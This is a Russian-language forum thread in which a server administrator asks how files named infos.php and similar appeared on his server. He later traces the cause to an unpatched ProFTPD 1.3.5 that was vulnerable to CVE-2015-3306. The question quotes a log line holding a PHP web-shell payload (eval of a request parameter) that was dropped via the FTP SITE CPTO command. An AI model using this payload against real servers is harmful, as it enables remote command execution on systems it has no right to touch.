Взломали, файлы infos.php, infs.php, infosof.php, как и откуда?

Приветствую!
На сервер сегодня в открытые папки для записи упали файлы с содержимым:
proftpd: 93.83.111.21:51918: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD;?>

Благо серв был настроен и ничего страшного не произошло, но вопрос - как и откуда??
P.S. proftpd версии 1.3.6 (все пакеты актуальные всегда)
  • Вопрос задан
  • 933 просмотра
Решения вопроса 1
PavelK
@PavelK Автор вопроса
В общем косяк был мой. Давно, когда вышла уязвимость CVE-2015-3306, обновил я proftpd из исходников, поленившись собрать deb пакет. При перезагрузке сервера загрузилась не обновлённая версия, а старая =(
в итоге, я думал, что у меня 1.3.6, а работала на самом деле 1.3.5.
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
Frankenstine
@Frankenstine
Сисадмин
Забрутили/проснифали пароль? Курите логи аутентификации :)
Ответ написан
Dit81
@Dit81
Security researcher, pentester, internet-marketer
Трояны, вирусы, слабые угадываемые пароли... Путей масса. Возможно совпадение паролей для различных сервисов и сайтов...
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы